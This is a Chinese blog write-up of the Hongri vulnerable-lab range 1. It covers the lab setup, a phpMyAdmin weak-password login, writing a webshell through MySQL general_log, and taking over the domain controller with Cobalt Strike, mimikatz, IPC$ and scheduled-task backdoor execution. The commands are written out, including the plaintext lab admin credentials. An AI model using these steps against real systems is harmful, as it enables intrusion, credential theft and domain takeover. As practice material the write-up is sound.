首页 > 其他分享 >红日靶场1

红日靶场1

时间:2024-06-02 17:10:21浏览次数:11  
标签:红日 shell web 192.168 上线 域控 52.138 靶场

环境搭建

对web机添加两张网卡
一张nat(web机默认为内网网段),另一张桥接为出网网卡
也可nat+仅主机但是网络环境问题多
image
这样环境就搭好了
重启修改密码,启动phpstudy

web渗透

扫描ip
nmap -sP 192.168.1.0/24
image
得到192.168.1.9等,7为kali机ip,12为虚拟机ip
访问http://192.168.1.9
发现为php探针
image
扫描端口服务
nmap -sP -Pn 192.168.1.9
image
扫描web目录
gobuster dir -u http://192.168.1.9 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
image
发现phpmayadmin数据库管理后台
image

测试弱口令登录成功
root root
尝试写入一句话木马,不知道绝对路径,尝试日志写入

查看general log 是否开启
show variables like '%general%';
image

开启
SET GLOBAL general_log='on';
更改路径
SET GLOBAL general_log_file='C:\\phpStudy\\WWW\\shell.php';
image

查询写入一句话木马

image
蚁剑连接
image

传入cs后门并执行上线
image

域渗透

cs域控
shell net time /domain
image
得到域控域名
域控一般是dns解析服务器
查询ip
shell ipconfig /all
image

image
猜测为域控
上传fscan扫描
shell fscan.exe -h 192.168.52.138

image
确认为域控并且开放了445等端口
上线域控
法一
直接psexec上线,要配置smb监听
image

image

image

成功上线域控

法二
利用ipc+计划任务(或系统服务)横向
mimikatz抓取密码
image

image
得到域管明文密码
连接ipc
shell net use \\192.168.52.138\ipc$ "123.com" /user:administrator

image

复制后门到域控

shell copy r2.exe \\192.168.52.138\C$

image

创建计划任务并执行

shell schtasks /create /s 192.168.52.138 /tn "text" /sc onstart /tr c:\r2.exe /ru system /f
shell schtasks /run /s 192.168.52.138 /i /tn "text"

image

image

成功上线域控

上线域控还有很多方式,不一一举例了

标签:红日,shell,web,192.168,上线,域控,52.138,靶场
From: https://www.cnblogs.com/v3n0m-cccccc/p/18227330

相关文章

  • DC-5靶场渗透实战过程(个人学习)
    环境安装DC-5下载地址:https://www.vulnhub.com/entry/dc-4,313/下载完成安装后,将kali和DC-5的靶场网络环境设置一致kali的IP:192.168.37.129一、信息收集寻找靶机的IP方法一:利用nmap命令查找靶机IP方法二:利用arp-scan-l查看局域网内其他IP方式查找靶机IP发现靶机的IP为......
  • vulnhub--JIS靶场
    环境搭建kali(攻击机,NAT):192.168.96.4靶机(linux,NAT):ip未知信息收集主机探测netdiscover-i监听网卡发现96网段存活主机,猜测是96.5为靶机地址端口扫描nmap-sS-v192.168.96.5(高校快速的扫描,TCP半链接扫描) nmap-A192.168.96.5(全面扫描,更全面)fscan既可以扫端口又......
  • Less靶场SQL注入通关宝典
    这篇文章是一个sqil-labs靶场的保姆级教学,从安装、配置、场景通关都有详细的介绍,其中场景通关是我们这篇文章的重点。首先我们要了解sqli-labs靶场是什么?sqli-labs靶场是刚刚接触SQL注入的新手,了解SQL注入、练习SQL注入的一个很方便,很实用的一个靶场,配置简单,操作简单......
  • hongri靶场1
    靶机分享http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境搭建可以参照博客https://blog.csdn.net/weixin_44288604/article/details/108172737环境配置后各主机信息(仅个人)信息收集扫描端口namp扫描nmap-A-p-192.168.20.11(web服务器的对外ip)主机开放了两......
  • UploadLabs靶场
    目录Pass-01Pass-02Pass-03Pass-04Pass-05Pass-06Pass-07Pass-08Pass-09Pass-10Pass-11Pass-12Pass-13Pass-14Pass-15Pass-16Pass-17Pass-18Pass-19Pass-20都是鄙人做题思路记下来的一些心得笔记罢了。Pass-01先传一个图片过去,成功上传。尝试传muma过去,提示失败,但是这个提......
  • 靶场合集
    1.vulnhub很多安全竞赛都有在这里面出题,系列非常之多,不仅仅有web方面的,也有系统方面的渗透。网上也有很多writeup,环境直接下载虚拟机压缩包,解压即可使用。新手朋友建议下载先自行测试,然后再看writeup解题https://vulhub.org/(在线版)https://github.com/vulhub/vulhub(离线版)2.......
  • CSRF(Pikachu靶场练习)
    CSRF(get)自己随便输点东西,回显登录失败,查看源码没发现什么点开提示,登录进去看看看到可以修改个人信息,我们把居住改成China,修改成功,没发现urlhttp://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php有变化这次我们在submit时抓包看看/pikachu/vul/csrf/csrfget/cs......
  • DC2靶场
    DC2下载地址:https://download.vulnhub.com/dc/DC-2.zip题目要求:MuchlikeDC-1,DC-2isanotherpurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.AswiththeoriginalDC-1,it'sdesignedwithbeginners......
  • DC1靶场练习
    DC1下载地址:https://download.vulnhub.com/dc/DC-1.zip题目要求:DC-1isapurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.Itwasdesignedtobeachallengeforbeginners,butjusthoweasyitiswillde......
  • 【攻防靶场系列】WEB LLM 学习及实操(一)
    什么是LLM❓大型语言模型(LLM)是一种AI算法,可以处理用户输入并通过预测单词序列来创建合理的响应。他们在巨大的半公开数据集上接受训练,使用机器学习来分析语言的组成部分如何组合在一起。如何检测LLM漏洞❓确定LLM(语言模型)的输入,包括直接输入(如提示)和间接输入(如训练数......